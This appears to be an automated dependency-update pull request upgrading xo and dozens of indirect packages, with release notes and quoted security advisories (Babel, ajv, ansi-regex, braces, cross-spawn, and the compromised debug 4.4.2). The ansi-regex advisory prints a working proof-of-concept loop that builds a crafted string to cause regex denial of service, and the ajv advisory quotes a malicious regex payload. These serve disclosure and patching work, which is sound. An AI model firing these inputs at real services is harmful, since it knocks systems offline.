๐Ÿšจ [security] Update xo 0.44.0 โ†’ 2.0.2 (major)

๐Ÿšจ Your current dependencies have known security vulnerabilities ๐Ÿšจ

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this upgrade. Please take a good look at what changed and the test results before merging this pull request.

What changed?

โœณ๏ธ xo (0.44.0 โ†’ 2.0.2) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ @โ€‹babel/code-frame (indirect, 7.12.11 โ†’ 7.29.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹babel/compat-data (indirect, 7.15.0 โ†’ 7.29.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹babel/core (indirect, 7.15.0 โ†’ 7.29.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹babel/generator (indirect, 7.15.0 โ†’ 7.29.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 4 commits:

โ†—๏ธ @โ€‹babel/helper-compilation-targets (indirect, 7.15.0 โ†’ 7.28.6) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ @โ€‹babel/helper-module-imports (indirect, 7.14.5 โ†’ 7.28.6) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ @โ€‹babel/helper-module-transforms (indirect, 7.15.0 โ†’ 7.28.6) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ @โ€‹babel/helper-validator-identifier (indirect, 7.14.9 โ†’ 7.28.5) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 48 commits:

โ†—๏ธ @โ€‹babel/helpers (indirect, 7.14.8 โ†’ 7.28.6) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups

Impact

When using Babel to compile regular expression named capturing groups, Babel will generate a polyfill for the .replace method that has quadratic complexity on some specific replacement pattern strings (i.e. the second argument passed to .replace).

Your generated code is vulnerable if all the following conditions are true:

  • You use Babel to compile regular expression named capturing groups
  • You use the .replace method on a regular expression that contains named capturing groups
  • Your code uses untrusted strings as the second argument of .replace

If you are using @babel/preset-env with the targets option, the transform that injects the vulnerable code is automatically enabled if:

  • you use duplicated named capturing groups, and target any browser older than Chrome/Edge 126, Opera 112, Firefox 129, Safari 17.4, or Node.js 23
  • you use any named capturing groups, and target any browser older than Chrome 64, Opera 71, Edge 79, Firefox 78, Safari 11.1, or Node.js 10

You can verify what transforms @babel/preset-env is using by enabling the debug option.

Patches

This problem has been fixed in @babel/helpers and @babel/runtime 7.26.10 and 8.0.0-alpha.17, please upgrade. It's likely that you do not directly depend on @babel/helpers, and instead you depend on @babel/core (which itself depends on @babel/helpers). Upgrading to @babel/core 7.26.10 is not required, but it guarantees that you are on a new enough @babel/helpers version.

Please note that just updating your Babel dependencies is not enough: you will also need to re-compile your code.

Workarounds

If you are passing user-provided strings as the second argument of .replace on regular expressions that contain named capturing groups, validate the input and make sure it does not contain the substring $< if it's then not followed by > (possibly with other characters in between).

References

This vulnerability was reported and fixed in #17173.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ @โ€‹babel/parser (indirect, 7.15.2 โ†’ 7.29.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹babel/template (indirect, 7.14.5 โ†’ 7.28.6) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ @โ€‹babel/traverse (indirect, 7.15.0 โ†’ 7.29.0) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code

Impact

Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()or path.evaluateTruthy() internal Babel methods.

Known affected plugins are:

  • @babel/plugin-transform-runtime
  • @babel/preset-env when using its useBuiltIns option
  • Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator

No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.

Users that only compile trusted code are not impacted.

Patches

The vulnerability has been fixed in @babel/traverse@7.23.2.

Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.

Workarounds

  • Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
  • If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
    • @babel/plugin-transform-runtime v7.23.2
    • @babel/preset-env v7.23.2
    • @babel/helper-define-polyfill-provider v0.4.3
    • babel-plugin-polyfill-corejs2 v0.4.6
    • babel-plugin-polyfill-corejs3 v0.8.5
    • babel-plugin-polyfill-es-shims v0.10.0
    • babel-plugin-polyfill-regenerator v0.5.3
Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹babel/types (indirect, 7.15.0 โ†’ 7.29.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ @โ€‹eslint/eslintrc (indirect, 0.4.3 โ†’ 3.3.5) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

โ†—๏ธ @โ€‹types/eslint (indirect, 7.28.0 โ†’ 9.6.1) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ @โ€‹types/estree (indirect, 0.0.50 โ†’ 1.0.8) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ @โ€‹types/json-schema (indirect, 7.0.9 โ†’ 7.0.15) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ @โ€‹typescript-eslint/eslint-plugin (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ @โ€‹typescript-eslint/parser (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ @โ€‹typescript-eslint/scope-manager (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ @โ€‹typescript-eslint/types (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ @โ€‹typescript-eslint/typescript-estree (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ @โ€‹typescript-eslint/visitor-keys (indirect, 4.29.1 โ†’ 8.57.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ acorn (indirect, 7.4.1 โ†’ 8.16.0) ยท Repo

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ ajv (indirect, 6.12.6 โ†’ 6.14.0) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ ajv has ReDoS when using `$data` option

ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., \"^(a|a)*$\") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ ansi-escapes (indirect, 4.3.2 โ†’ 7.3.0) ยท Repo

Release Notes

7.3.0

  • Add synchronized output escapes 9b1e276

v7.2.0...v7.3.0

7.2.0

  • Enable ANSI escape sequences on modern Windows b5d50b8
  • Add tmux support for OSC sequences 6fe0daa

v7.1.1...v7.2.0

7.1.1

  • Fix compatibility for image() with xterm.js (#39) b739b18

v7.1.0...v7.1.1

7.1.0

v7.0.0...v7.1.0

7.0.0

Breaking

Improvements

v6.2.1...v7.0.0

6.2.1

  • Fix compatibility with TypeScript 5.4 3b1f99e

v6.2.0...v6.2.1

6.2.0

  • Add escapes for entering/exiting the alternative screen (#33) 2f25a50

v6.1.0...v6.2.0

6.1.0

v6.0.0...v6.1.0

6.0.0

Breaking

Improvements

v5.0.0...v6.0.0

5.0.0

Breaking

v4.3.2...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

โ†—๏ธ ansi-regex (indirect, 5.0.0 โ†’ 6.2.2) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ Inefficient Regular Expression Complexity in chalk/ansi-regex

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

๐Ÿšจ Inefficient Regular Expression Complexity in chalk/ansi-regex

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

Release Notes

6.2.2

6.2.0

  • Support colon separated parameters to control sequences (#62) df7d75f

v6.1.0...v6.2.0

6.1.0

  • Match cursorSave and cursorRestore escape codes (#45) 02fa893
  • Fix: Handle all valid ST characters (#58) 9cba40d

v6.0.1...v6.1.0

6.0.1

Fixes

  • Fix ReDoS in certain cases (#37)
    You are only really affected if you run the regex on untrusted user input in a server context, which it's very unlikely anyone is doing, since this regex is mainly used in command-line tools.

v6.0.0...v6.0.1

Thank you @yetingli for the patch and reproduction case!

6.0.0

Breaking

v5.0.0...v6.0.0

5.0.1

Fixes (backport of 6.0.1 to v5)

This is a backport of the minor ReDos vulnerability in ansi-regex@<6.0.1, as requested in #38.

  • Fix ReDoS in certain cases (#37)
    You are only really affected if you run the regex on untrusted user input in a server context, which it's very unlikely anyone is doing, since this regex is mainly used in command-line tools.

CVE-2021-3807

https://github.com/chalk/ansi-regex/compare/v5.0.0..v5.0.1

Thank you @yetingli for the patch and reproduction case!

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 17 commits:

โ†—๏ธ argparse (indirect, 1.0.10 โ†’ 2.0.1) ยท Repo ยท Changelog

Release Notes

2.0.1 (from changelog)

Fixed

  • Fix issue with process.argv when used with interpreters (coffee, ts-node, etc.), #150.

2.0.0 (from changelog)

Changed

  • Full rewrite. Now port from python 3.9.0 & more precise following. See doc for difference and migration info.
  • node.js 10+ required
  • Removed most of local docs in favour of original ones.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ array-includes (indirect, 3.1.3 โ†’ 3.1.9) ยท Repo ยท Changelog

Release Notes

3.1.9 (from changelog)

Commits

  • [Deps] update call-bind, es-abstract, es-object-atoms, get-intrinsic, is-string 3b934ae
  • [Refactor] use call-bound and math-intrinsics directly 160ea60
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, auto-changelog, hastrict-mode, tape 4e4c67d
  • [Tests] replace aud with npm audit 9c5ec1c
  • [Dev Deps] add missing peer dep 863d207

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 40 commits:

โ†—๏ธ array.prototype.flat (indirect, 1.2.4 โ†’ 1.3.3) ยท Repo ยท Changelog

Release Notes

1.3.3 (from changelog)

Commits

  • [actions] split out node 10-20, and 20+ 1afcd57
  • [Deps] update call-bind, define-properties, es-abstract, es-shim-unscopables 152c437
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, auto-changelog, function-bind npmignore, object-inspect, tape e39e33d
  • [Tests] replace aud with npm audit 6868723
  • [Dev Deps] add missing peer dep 800f3e3

1.3.2 (from changelog)

Commits

  • [Deps] update define-properties, es-abstract fb625eb
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, aud, object-inspect, tape 1fde275

1.3.1 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file e339ed7
  • [meta] add auto-changelog bb5cbd6
  • [Deps] update define-properties, es-abstract 8067910
  • [actions] update rebase action to use reusable workflow d4d9b28
  • [Dev Deps] update aud, object-inspect, tape d9d7300

1.3.0 (from changelog)

  • [New] shim/auto: add flat to Symbol.unscopables
  • [Deps] update es-abstract
  • [actions] reuse common workflows
  • [actions] update codecov uploader
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, aud, auto-changelog, object-inspect, safe-publish-latest, tape

1.2.5 (from changelog)

  • [readme] add github actions/codecov badges; remove travis badge
  • [Deps] update call-bind, es-abstract
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, aud, has-strict-mode, object-inspect, tape
  • [meta] use prepublishOnly, for npm 7+
  • [actions] use node/install instead of node/run; use codecov action
  • [actions] update workflows
  • [Tests] increase coverage
  • [meta] fix changelog for v1.2.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 37 commits:

โ†—๏ธ balanced-match (indirect, 1.0.2 โ†’ 4.0.4) ยท Repo

Release Notes

3.0.1

  • package.json: Switch from "main" to "exports" (#50) b704dff
  • Create CODE_OF_CONDUCT.md 7e7530b
  • Bump minimist from 1.2.5 to 1.2.8 (#49) 56630b9

v3.0.0...v3.0.1

3.0.0

Major change because this is an ESM now ๐Ÿ‘‹ Nothing else major changed.

v2.0.0...v3.0.0

2.0.0

  • update package-lock.json 943cca0
  • Revert "Revert "travis: update node versions (#30)"" 42b669c
  • Revert "Revert "add np"" 967928c
  • Revert "Revert "update matcha"" a1889df
  • Revert "Revert "add prettier-standard"" a85dffa
  • Revert "Revert "add standard"" a293c68

v1.0.2...v2.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 39 commits:

โ†—๏ธ brace-expansion (indirect, 1.1.11 โ†’ 5.0.4) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ brace-expansion Regular Expression Denial of Service vulnerability

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is a5b98a4f30d7813266b221435e1eaaf25a1b0ac5. It is recommended to upgrade the affected component.

๐Ÿšจ brace-expansion Regular Expression Denial of Service vulnerability

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is a5b98a4f30d7813266b221435e1eaaf25a1b0ac5. It is recommended to upgrade the affected component.

๐Ÿšจ brace-expansion Regular Expression Denial of Service vulnerability

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is a5b98a4f30d7813266b221435e1eaaf25a1b0ac5. It is recommended to upgrade the affected component.

๐Ÿšจ brace-expansion Regular Expression Denial of Service vulnerability

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is a5b98a4f30d7813266b221435e1eaaf25a1b0ac5. It is recommended to upgrade the affected component.

Release Notes

4.0.1

  • fmt 5a5cc17
  • Fix potential ReDoS Vulnerability or Inefficient Regular Expression (#65) 0b6a978

v4.0.0...v4.0.1

4.0.0

v3.0.0...v4.0.0

As a precaution to not risk breaking anything with 278132b, this is a new semver major release

3.0.1

  • pkg: publish on tag 3.x 3059c07
  • fmt 8229e6f
  • Fix potential ReDoS Vulnerability or Inefficient Regular Expression (#65) 15f9b3c

v3.0.0...v3.0.1

3.0.0

v2.0.1...v3.0.0

2.0.2

  • pkg: publish on tag 2.x 14f1d91
  • fmt ed7780a
  • Fix potential ReDoS Vulnerability or Inefficient Regular Expression (#65) 36603d5

v2.0.1...v2.0.2

1.1.12

  • pkg: publish on tag 1.x c460dbd
  • fmt ccb8ac6
  • Fix potential ReDoS Vulnerability or Inefficient Regular Expression (#65) c3c73c8

v1.1.11...v1.1.12

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 50 commits:

โ†—๏ธ braces (indirect, 3.0.2 โ†’ 3.0.3) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Uncontrolled resource consumption in braces

The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.

Commits

See the full diff on Github. The new version differs by 12 commits:

โ†—๏ธ browserslist (indirect, 4.16.7 โ†’ 4.28.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ builtin-modules (indirect, 3.2.0 โ†’ 5.0.0) ยท Repo

Release Notes

5.0.0

Breaking

  • Remove punycode since it's deprecated

Improvements

v4.0.0...v5.0.0

4.0.0

Breaking

  • Require Node.js 18 75f59d3
  • This package is now pure ESM. Please read this.
  • This package now only exports a static list of built-ins 75f59d3
    • To get a list of built-ins for the current Node.js version, use the built-in API: import {builtinModules} from 'node:module'

v3.3.0...v4.0.0

3.3.0

  • Update static list of built-in modules e95a7b5
  • Improve browser compatibility (#15) 0a73da3

v3.2.0...v3.3.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

โ†—๏ธ call-bind (indirect, 1.0.2 โ†’ 1.0.8) ยท Repo ยท Changelog

Release Notes

1.0.8 (from changelog)

Commits

  • [Refactor] extract out some helpers and avoid get-intrinsic usage 407fd5e
  • [Refactor] replace code with extracted call-bind-apply-helpers 81018fb
  • [Tests] use set-function-length/env 0fc311d
  • [actions] split out node 10-20, and 20+ 77a0cad
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, es-value-fixtures, gopd, object-inspect, tape a145d10
  • [Tests] replace aud with npm audit 30ca3dd
  • [Deps] update set-function-length 57c79a3
  • [Dev Deps] add missing peer dep 601cfa5

1.0.7 (from changelog)

Commits

  • [Refactor] use es-define-property 09b76a0
  • [Deps] update get-intrinsic, set-function-length ad5136d

1.0.6 (from changelog)

Commits

  • [Dev Deps] update aud, npmignore, tape d564d5c
  • [Deps] update get-intrinsic, set-function-length cfc2bdc
  • [Refactor] use es-errors, so things that only need those do not need get-intrinsic 64cd289
  • [meta] add missing engines.node 32a4038

1.0.5 (from changelog)

Commits

  • [Fix] throw an error on non-functions as early as possible f262408
  • [Deps] update set-function-length 3fff271

1.0.3 (from changelog)

Commits

  • [actions] reuse common workflows a994df6
  • [meta] use npmignore to autogenerate an npmignore file eef3ef2
  • [readme] flesh out content 1845ccf
  • [actions] use node/install instead of node/run; use codecov action 5b47d53
  • [Refactor] use set-function-length a0e165c
  • [Dev Deps] update @ljharb/eslint-config, aud, tape 9c50103
  • [meta] simplify "exports" 019c6d0
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, safe-publish-latest, tape 23bd718
  • [actions] update codecov uploader 62552d7
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, tape ec81665
  • [Dev Deps] update eslint, @ljharb/eslint-config, safe-publish-latest, tape 35d67fc
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, tape 0266d8d
  • [Dev Deps] update @ljharb/eslint-config, aud, tape 43a5b28
  • [Deps] update define-data-property, function-bind, get-intrinsic 780eb36
  • [Dev Deps] update aud, tape 90d50ad
  • [meta] use prepublishOnly script for npm 7+ 44c5433
  • [Deps] update get-intrinsic 86bfbfc
  • [Deps] update get-intrinsic 5c53354
  • [actions] update checkout action 4c393a8
  • [Deps] update get-intrinsic 4e70bde
  • [Deps] update get-intrinsic 55ae803

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 43 commits:

โ†—๏ธ caniuse-lite (indirect, 1.0.30001249 โ†’ 1.0.30001779) ยท Repo ยท Changelog

โ†—๏ธ ci-info (indirect, 3.2.0 โ†’ 4.4.0) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ confusing-browser-globals (indirect, 1.0.10 โ†’ 1.0.11) ยท Repo ยท Changelog

Release Notes

1.0.11

1.0.11 (2017-08-09)

๐Ÿ› Bug Fix

  • create-react-app

    • #2884 Improve offline heuristic for proxied environments. (@bsyk)

      When a Yarn proxy is set, we will check its connectivity if we cannot reach Yarn's registry. This is often the case when DNS lookups must be made through the proxy.

    • #2853 Allow use of scoped packages with a pinned version. (@wileybenet)

  • react-dev-utils

    • #2796 Properly escape HTML tags in error overlay. (@ccloli)

      Elements printed in their entirety would sometimes render as HTML. This should no longer happen and should properly render as text.

  • react-dev-utils, react-scripts

  • react-scripts

๐Ÿ’… Enhancement

  • react-scripts

    • #2818 Allow sourcemaps to be disabled. (@viankakrisna)

      As applications grow more complex, it is possible webpack may run out of memory while generating source maps. They may now be disabled by setting GENERATE_SOURCEMAP=false.

    • #2913 Allow flags to be passed to node when running react-scripts. (@koistya)

    • #2574 Upgrade to webpack@3. (@themre)

    • #2747 Simplify webpack configuration using Rule.oneOf. (@Furizaa)

  • react-dev-utils, react-scripts
  • create-react-app
    • #2785 Change error wording and list conflicting files when initializing app. (@OwenFlood)
  • react-dev-utils
  • eslint-config-react-app, react-scripts
  • eslint-config-react-app

๐Ÿ“ Documentation

๐Ÿ  Internal

  • create-react-app, eslint-config-react-app, react-dev-utils, react-error-overlay, react-scripts
  • eslint-config-react-app
  • Other
  • react-scripts

Committers: 26

Migrating from 1.0.10 to 1.0.11

Inside any created project that has not been ejected, run:

npm install --save --save-exact react-scripts@1.0.11

or

yarn add --exact react-scripts@1.0.11

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 39 commits:

โ†—๏ธ convert-source-map (indirect, 1.8.0 โ†’ 2.0.0) ยท Repo

Commits

See the full diff on Github. The new version differs by 10 commits:

โ†—๏ธ cosmiconfig (indirect, 7.0.0 โ†’ 9.0.1) ยท Repo ยท Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ cross-spawn (indirect, 7.0.3 โ†’ 7.0.6) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Regular Expression Denial of Service (ReDoS) in cross-spawn

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

Release Notes

7.0.6 (from changelog)

Bug Fixes

  • update cross-spawn version to 7.0.5 in package-lock.json (f700743)

7.0.5 (from changelog)

Bug Fixes

  • fix escaping bug introduced by backtracking (640d391)

7.0.4 (from changelog)

Bug Fixes

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 15 commits:

โ†—๏ธ debug (indirect, 4.3.2 โ†’ 4.4.3) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ debug@4.4.2 contains malware after npm account takeover

Impact

On 8 September 2025, the npm publishing account for debug was taken over after a phishing attack. Version 4.4.2 was published, functionally identical to the previous patch version, but with a malware payload added attempting to redirect cryptocurrency transactions to the attacker's own addresses from within browser environments.

Local environments, server environments, command line applications, etc. are not affected. If the package was used in a browser context (e.g. a direct <script> inclusion, or via a bundling tool such as Babel, Rollup, Vite, Next.js, etc.) there is a chance the malware still exists and such bundles will need to be rebuilt.

The malware seemingly only targets cryptocurrency transactions and wallets such as MetaMask. See references below for more information on the payload.

Patches

npm removed the offending package from the registry over the course of the day on 8 September, preventing further downloads from npm proper.

On 13 September, the package owner published new patch versions to help cache-bust those using private registries who might still have the compromised version cached. This version is functionally identical to the previously known-good version, published as a patch version bump above the compromised version.

Users should upgrade to the latest patch version, completely remove their node_modules directory, clean their package manager's global cache, and rebuild any browser bundles from scratch.

Those operating private registries or registry mirrors should purge the offending versions from any caches.

References

Point of Contact

In the event suspicious behavior is still observed for the package listed in this security advisory after performing all of the above cleaning operations (see Patches above), please reach out via one of the following channels of communication:

Release Notes

4.4.3

Functionally identical release to 4.4.1.

Version 4.4.2 is compromised. Please see #1005.

4.4.1

What's Changed

  • fix(Issue-996): replace whitespaces in namespaces string with commas globally by @pdahal-cx in #997
  • fixes #987 fallback to localStorage.DEBUG if debug is not defined by @lzilioli in #988

New Contributors

Full Changelog: 4.4.0...4.4.1

4.4.0

Fixes (hopefully) the inefficient regex warnings in .enable().

Minor version as this is invariably going to break certain users who misuse the .enable() API and expected it to work with regexes, which was never supported nor documented. That's on you, sorry - that functionality won't be added back.

Full Changelog: 4.3.7...4.4.0

4.3.7

What's Changed

Full Changelog: 4.3.6...4.3.7

4.3.6

What's Changed

  • Avoid using deprecated RegExp.$1 by @bluwy in #969

New Contributors

Full Changelog: 4.3.5...4.3.6

4.3.5

Patch

Thank you @calvintwr for the fix.

4.3.4

What's Changed

  • Add section about configuring JS console to show debug messages by @gitname in #866
  • Replace deprecated String.prototype.substr() by @CommanderRoot in #876

New Contributors

Full Changelog: 4.3.3...4.3.4

4.3.3

Patch Release 4.3.3

This is a documentation-only release. Further, the repository was transferred. Please see notes below.

  • Migrates repository from https://github.com/visionmedia/debug to https://github.com/debug-js/debug. Please see notes below as to why this change was made.
  • Updates repository maintainership information
  • Updates the copyright (no license terms change has been made)
  • Removes accidental epizeuxis (#828)
  • Adds README section regarding usage in child procs (#850)

Thank you to @taylor1791 and @kristofkalocsai for their contributions.

Repository Migration Information

I've formatted this as a FAQ, please feel free to open an issue for any additional question and I'll add the response here.

Q: What impact will this have on me?

In most cases, you shouldn't notice any change.

The only exception I can think of is if you pull code directly from https://github.com/visionmedia/debug, e.g. via a "debug": "visionmedia/debug"-type version entry in your package.json - in which case, you should still be fine due to the automatic redirection Github sets up, but you should also update any references as soon as possible.

Q: What are the security implications of this change?

If you pull code directly from the old URL, you should update the URL to https://github.com/debug-js/debug as soon as possible. The old organization has many approved owners and thus a new repository could (in theory) be created at the old URL, circumventing Github's automatic redirect that is in place now and serving malicious code. I (@Qix-) also wouldn't have access to that repository, so while I don't think it would happen, it's still something to consider.

Even in such a case, however, the officially released package on npm (debug) would not be affected. That package is still very much under control (even more than it used to be).

Q: What should I do if I encounter an issue related to the migration?

Search the issues first to see if someone has already reported it, and then open a new issue if someone has not.

Q: Why was this done as a 'patch' release? Isn't this breaking?

